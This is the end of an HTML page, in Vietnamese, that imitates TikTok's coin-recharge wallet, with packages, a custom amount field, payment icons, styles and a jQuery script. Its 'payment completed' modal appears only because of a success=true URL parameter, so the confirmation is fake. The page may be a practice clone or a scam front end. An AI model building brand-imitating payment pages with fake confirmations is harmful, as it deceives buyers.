                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61"><span data-e2e="wallet-package-coin-icon-6" class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-num-6" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">17,500</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64"><span data-e2e="wallet-package-price-6" class="tiktok-10102vh-SpanTextNow e4yj8b66">₫ 4,775,000</span></div>
                                        </button>
                                    </li>
                                    <li>
                                        <button data-e2e="wallet-package-custom" aria-label="Tùy chỉnh" aria-selected="false" class="tiktok-1iz2hiv-ButtonContainer e4yj8b60">
                                            <div class="tiktok-16jd2dh-DivNumContainer e4yj8b61 div1"><span class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span><span data-e2e="wallet-package-coin-text-custom" class="tiktok-wkgdjt-SpanNumDisplay e4yj8b63">Tùy chỉnh</span></div>
                                            <div class="tiktok-1uetk1w-DivTextContainer e4yj8b64 div1"><span data-e2e="wallet-package-text-custom" class="tiktok-10102vh-SpanTextNow e4yj8b66">Hỗ trợ số lượng lớn</span></div>
                                            <div style="display: none" class="tiktok-16jd2dh-DivNumContainer e4yj8b61 div2"><span class="tiktok-240y52-SpanNumIcon e4yj8b62"><svg class="tiktok-kkwvro-StyledCoinIcon e4yj8b611" width="1em" data-e2e="" height="1em" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="24" cy="24" r="22" fill="#FFEC9B"></circle><circle cx="24" cy="24" r="17" fill="#FACE15"></circle><path fill-rule="evenodd" clip-rule="evenodd" d="M40.9347 25.5C40.9779 25.0058 41 24.5055 41 24C41 14.6112 33.3888 7 24 7C14.6112 7 7 14.6112 7 24C7 24.5055 7.02206 25.0058 7.06527 25.5C7.82466 16.8137 15.1166 10 24 10C32.8834 10 40.1753 16.8137 40.9347 25.5Z" fill="#FABC15"></path><path d="M33 19C30.2041 19 27.9375 16.7614 27.9375 14H24.5625V27.6111C24.5625 29.2986 23.1774 30.6667 21.4688 30.6667C19.7601 30.6667 18.375 29.2986 18.375 27.6111C18.375 25.9236 19.7601 24.5556 21.4688 24.5556C21.722 24.5556 21.9659 24.5853 22.1981 24.6406C22.2365 24.6497 22.2747 24.6596 22.3125 24.6701V21.2763C22.0358 21.2406 21.7541 21.2222 21.4688 21.2222C17.8962 21.2222 15 24.0826 15 27.6111C15 31.1396 17.8962 34 21.4688 34C25.0413 34 27.9375 31.1396 27.9375 27.6111V20.6673C29.3477 21.7134 31.1005 22.3333 33 22.3333V19Z" fill="#FEF5CD"></path></svg></span>
                                                <input oninput="onkeypressNum()" id="customNumber" data-e2e="wallet-package-coin-custom-input-box" type="number " pattern="[0-9]*" aria-describedby="error-tip" class="tiktok-1a6v254-InputNum e4yj8b67" value="">
                                                </div>
                                            <div style="display: none" class="tiktok-1uetk1w-DivTextContainer e4yj8b64 div2">
                                                <span id="validate" data-e2e="wallet-package-text-custom" class="tiktok-10102vh-SpanTextNow e4yj8b66">30-2,500,000</span>
                                            </div>
                                        </button>
                                    </li>
                                </ol>
                            </div>
                            <div class="tiktok-11ddo6h-DivTotalContainer ">
                                <ul class="tiktok-fbshyx-UlPaymentMethodsContainer ">
                                    <li><span data-e2e="wallet-title-payment-method" class="tiktok-iuydjj-SpanTotalText e1ndw46o2">Phương thức thanh toán</span></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/momo_4256e5.png" data-e2e="wallet-payment-icon-MOMO" alt="MoMo" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/zalopay-icon_e8534b.svg" data-e2e="wallet-payment-icon-ZALOPAY" alt="ZaloPay" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/visa_light_c558fb.svg" data-e2e="wallet-payment-icon-VISA" alt="Visa" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/mastercard-gray-update_7b3ceb.svg" data-e2e="wallet-payment-icon-MASTER" alt="Mastercard" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sg/sky/card_american_express_v1_429e0f.svg" data-e2e="wallet-payment-icon-AMEX" alt="American Express" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sg/sky/diners_a3de24.svg" data-e2e="wallet-payment-icon-DINERS" alt="DINERS" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sg/sky/discover_5ec158.svg" data-e2e="wallet-payment-icon-DISCOVER" alt="Discover" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                    <li><img src="https://lf16-co.g-p-static.com/obj/pipo-sgcompliance/sky/2c2p-border_2ec2d6.png" data-e2e="wallet-payment-icon-BANK_TRANSFER" alt="2c2p banktransfer" class="tiktok-1quc8c-ImgPaymentIcon e1ndw46o5"></li>
                                </ul>
                            </div>
                            <div class="tiktok-1fguu8v-DivTotalContainer e9ndt4q0"><span data-e2e="wallet-title-total-price" class="tiktok-b4z60k-SpanTotalText e9ndt4q5">Tổng</span><span aria-live="polite" data-e2e="wallet-total-price" class="tiktok-s1n2m4-SpanTotalMount e9ndt4q6" id="pricee">₫ 0</span></div>
                            <div class="tiktok-vr1v8s-DivButtonContainer e9ndt4q8">

                                <button id="btnprice" type="button" data-e2e="wallet-button-buynow" aria-label="Nạp tiền" aria-live="polite" class="e9ndt4q10 tiktok-18w9yy9-Button-StyledBuyButton ehk74z00">Nạp tiền</button>

                            </div>
                        </div>
                    </div>
                </div>

                <div class="container">


                    <!-- Modal -->
                    <div class="modal fade" id="myModal" role="dialog">
                        <div class="modal-dialog">

                            <!-- Modal content-->
                            <div class="modal-content">
                                <div class="modal-body">
                                    <div class="" style="padding: 30px">
                                        <div class="row">
                                            <div class="col text-center" style="padding-top:80px">
                                                <button type="button" class="btn btn-default btn-sm" style="width: 50px; height: 50px; border-radius: 100%; font-size: 1.5em;">
                                                    <span style="color: green" class="glyphicon glyphicon-ok"></span>
                                                </button>
                                            </div>
                                        </div>
                                        <div class="row col text-center textModal">
                                            <span>Đã hoàn tất thanh toán</span>
                                        </div>
                                        <div class="row col text-center" style="margin-top: 10px">
                                            <span id="txtText">Bạn đã nạp thêm 17500 xu vào tài khoản của mình.Bạn có thể sử dụng xu để gửi quà tặng ảo cho các nhà sáng tạo</span>
                                        </div>

                                        <div class="row col text-center">

                                            <button id="btnprice" type="button" data-dismiss="modal" data-e2e="wallet-button-buynow" aria-label="Quay lại" aria-live="polite" class="StyledBackButton">Quay lại</button>
                                        </div>
                                    </div>
                                </div>

                            </div>
                        </div>

                    </div>



</body>



</html>


<style>
    .tiktok-1hgiv7n-DivHeaderContainer {
        box-shadow: rgba(0, 0, 0, 0.12) 0px 1px 1px;
    }

    .tiktok-ukphjh-DivRechargeCoins {
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 18px;
        margin-top: 16px;
        line-height: 1.2;
    }

    .tiktok-1517q4i-DivRechargeAdvantageInfo {
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 18px;
        line-height: 25px;
        display: inline-block;
        margin-top: 12px;
        color: rgb(254, 44, 85);
    }

    .tiktok-1un7bi9-DivCoinsBkgContainer {
        margin: 12px 0px 10px;
    }

    .tiktok-1a7iizi-OlCoinsListContainer {
        padding: 0px;
        margin: 0px;
        list-style-type: none;
        width: 100%;
        position: relative;
        display: grid;
        grid-template-columns: repeat(auto-fit, 219px);
        gap: 24px;
        -webkit-box-pack: justify;
        justify-content: space-between;
    }

    .tiktok-1hkagfd-ButtonContainer {
        width: 100%;
        min-height: 96px;
        position: relative;
        display: flex;
        flex-direction: column;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        padding: 17px 2px 15px;
        border-radius: 4px;
        border: 2px solid rgb(250, 206, 21);
        user-select: none;
        cursor: pointer;
        pointer-events: initial;
        opacity: 1;
        background-color: transparent;
    }

    .tiktok-1iz2hiv-ButtonContainer {
        width: 100%;
        min-height: 96px;
        position: relative;
        display: flex;
        flex-direction: column;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        padding: 18px 2px 16px;
        border-radius: 4px;
        border: 1px solid rgba(22, 24, 35, 0.12);
        user-select: none;
        cursor: pointer;
        pointer-events: initial;
        opacity: 1;
        background-color: transparent;
    }

    .tiktok-fbshyx-UlPaymentMethodsContainer {
        width: 100%;
        margin: 0px 0px 12px;
        display: flex;
        -webkit-box-align: center;
        align-items: center;
        flex-wrap: wrap;
        gap: 4px;
        padding: 0px;
        list-style-type: none;
    }

    .tiktok-iuydjj-SpanTotalText {
        color: rgb(22, 24, 35);
        display: inline-block;
        margin-right: 2px;
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-size: 16px;
        line-height: 22px;
    }

    .tiktok-1quc8c-ImgPaymentIcon {
        width: 22px;
        height: 14px;
    }


    .tiktok-wkgdjt-SpanNumDisplay {
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-size: 24px;
        line-height: 1.2;
        display: inline-block;
        color: rgb(22, 24, 35);
        vertical-align: middle;
        margin-left: 8px;
        margin-right: 0px;
        font-weight: 700;
    }

    .tiktok-10102vh-SpanTextNow {
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 14px;
        color: rgba(22, 24, 35, 0.5);
        text-align: center;
        line-height: 1.1;
    }

    .tiktok-s1n2m4-SpanTotalMount {
        color: rgb(22, 24, 35);
        margin-left: 8px;
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 16px;
        line-height: 22px;
    }

    .tiktok-b4z60k-SpanTotalText {
        color: rgb(22, 24, 35);
        display: inline-block;
        margin-right: 6px;
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-size: 16px;
        line-height: 22px;
    }

    .tiktok-17w9yy9-Button-StyledBuyButton:hover {
        background: linear-gradient(0deg, rgba(0, 0, 0, 0.06), rgba(0, 0, 0, 0.06)), rgb(254, 44, 85);
    }

    .tiktok-18w9yy9-Button-StyledBuyButton {
        border-radius: 4px;
        border: none;
        color: rgb(255, 255, 255);
        background-color: rgb(254, 44, 85);
        min-height: 36px;
        display: flex;
        position: relative;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        padding: 6px 8px;
        user-select: none;
        cursor: pointer;
        box-sizing: border-box;
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 16px;
        line-height: 22px;
        margin-left: 0px;
        min-width: 100px;
        width: 200px;
        height: 46px;
    }




    .tiktok-dhqzc6-FormElement {
        display: flex;
        flex-direction: row;
        -webkit-box-align: center;
        align-items: center;
        padding: 12px 16px;
        background: rgba(22, 24, 35, 0.06);
        border-radius: 92px;
        position: relative;
        overflow: hidden;
        z-index: 1;
        margin: 0px;
    }

    .tiktok-8nwn5k-InputElement:placeholder-shown {
        text-overflow: ellipsis;
    }

    .tiktok-8nwn5k-InputElement {
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 400;
        font-size: 16px;
        line-height: 22px;
        border: none;
        background: transparent;
        outline: none;
        padding: 0px;
        width: 431px;
        color: rgb(22, 24, 35);
        caret-color: rgb(254, 44, 85);
        appearance: textfield;
    }

    .tiktok-1asq5wp-DivSearchFormContainer {
        position: relative;
    }

    .tiktok-16dy42q-ButtonSearch {
        padding: 11px 16px 11px 12px;
        margin: -12px -16px -12px 0px;
        font-size: 0px;
        cursor: pointer;
        outline: none;
        border: none;
        background: transparent;
    }

    .tiktok-hck1rr-SpanSpliter {
        width: 1px;
        height: 28px;
        margin: -3px 0px;
        background: rgba(22, 24, 35, 0.12);
    }

    .tiktok-krn24s-DivProfileAndBannerRow {
        width: 400px
    }

    li.selected {
        color: green;
    }

    .tiktok-1a6v254-InputNum {
        width: 134px;
        background-color: transparent;
        border-top: none;
        border-right: none;
        border-left: none;
        border-image: initial;
        border-bottom: 1px solid rgb(22, 24, 35);
        outline: none;
        text-align: center;
        color: rgb(22, 24, 35);
        font-weight: 100;
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-size: 24px;
        line-height: 32px;
    }

    .tiktok-10102vh-SpanTextNow {
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 14px;
        color: rgba(22, 24, 35, 0.5);
        text-align: center;
        line-height: 1.1;
    }

    .tiktok-17w9yy9-Button-StyledBuyButton {
        border: none;
        color: rgba(22, 24, 35, 0.34);
        background-color: rgba(22, 24, 35, 0.06);
        pointer-events: none;
        border-radius: 4px;
        min-height: 36px;
        display: flex;
        position: relative;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        padding: 6px 8px;
        user-select: none;
        cursor: pointer;
        box-sizing: border-box;
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 16px;
        line-height: 22px;
        margin-left: 0px;
        min-width: 100px;
        width: 200px;
        height: 46px;
    }

    .StyledBackButton {
        border-radius: 4px;
        border: none;
        color: rgb(255, 255, 255);
        background-color: rgb(254, 44, 85);
        min-height: 34px;
        /* display: flex; */
        position: relative;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        padding: 6px 8px;
        user-select: none;
        cursor: pointer;
        box-sizing: border-box;
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 15px;
        line-height: 22px;
        margin-left: 0px;
        min-width: 100px;
        width: 120px;
        height: 30px;
        margin-top: 20px;
    }


    .textModal {
        color: rgb(22, 24, 35);
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-weight: 700;
        font-size: 16px;
        line-height: 22px;
        margin-top: 20px
    }


    .tiktok-rint0b-PErrorTip {
        color: rgb(254, 44, 85);
        font-family: "IBM Plex Sans", ProximaNova, Arial, Tahoma, PingFangSC, sans-serif;
        font-size: 14px;
        height: 20px;
        text-align: center;
        line-height: 15px;
        display: flex;
        -webkit-box-align: center;
        align-items: center;
    }
</style>


<script>

    var price = 0;
    $(document).ready(function () {

        var myParam = location.search.split('success=')[1]

        if (myParam == "true") {

            $('#myModal').modal('show');

            $("#txtText").text("Bạn đã nạp thêm " + price.replace(",","") + " xu vào tài khoản của mình.Bạn có thể sử dụng xu để gửi quà tặng ảo cho các nhà sáng tạo")
        }

    });


    $(function () {
  

       $('#menu li').click(function () {
            $('ol > li button').removeClass();
            $('ol > li button').addClass('tiktok-1iz2hiv-ButtonContainer');

            if ($(this).find('button').hasClass('tiktok-1iz2hiv-ButtonContainer')) {
                $(this).find('button').removeClass()
                $(this).find('button').addClass('tiktok-1hkagfd-ButtonContainer')
            }
            else {
                $(this).find('button').addClass('tiktok-1iz2hiv-ButtonContainer')
            }

            if ($(this).prevAll().length + 1 == 8) {
                $(".div1").css('display', 'none')
                $(".div2").css('display', 'block')
                $("#pricee").text("₫ 0")

                $("#btnprice").removeClass();
                $("#btnprice").addClass('tiktok-17w9yy9-Button-StyledBuyButton');
                price = 0
            }
            else {
                $(".div1").css('display', 'block')
                $(".div2").css('display', 'none')
                $("#pricee").text("₫ " + $(this).find('button').attr('data-e2e'))

                $("#btnprice").removeClass();
                $("#btnprice").addClass('tiktok-18w9yy9-Button-StyledBuyButton');
                price = $(this).find('button').attr('data-e2e');
            }

        });

        $('#menu li:first-child button').click();

        $('#btnprice').click(function () {
            window.location.href = 'reject.html?price=' + price
        })

                


    });

    function onkeypressNum()
    {
        var input = parseInt($("#customNumber").val());

        if (isNaN(input)) {
            $("#validate").text("30-2,500,000")
            $("#validate").removeClass();
            $("#validate").addClass('tiktok-10102vh-SpanTextNow');

            return;
        }

        if (input < 30) {

            $("#validate").text("Tối thiểu 30")
            $("#validate").removeClass();
            $("#validate").addClass('tiktok-rint0b-PErrorTip');

            $("#btnprice").removeClass();
            $("#btnprice").addClass('tiktok-17w9yy9-Button-StyledBuyButton');
            return false;
        }
        else {
            var totalPrice = input * 272;
            $("#validate").text(totalPrice.toLocaleString('en-US', { style: 'currency', currency: 'VND' }))
            $("#validate").removeClass();
            $("#validate").addClass('tiktok-10102vh-SpanTextNow');
            $("#pricee").text(totalPrice.toLocaleString('en-US', { style: 'currency', currency: 'VND' }))

            $("#btnprice").removeClass();
            $("#btnprice").addClass('tiktok-18w9yy9-Button-StyledBuyButton');

            price = totalPrice;
        }

    }



</script>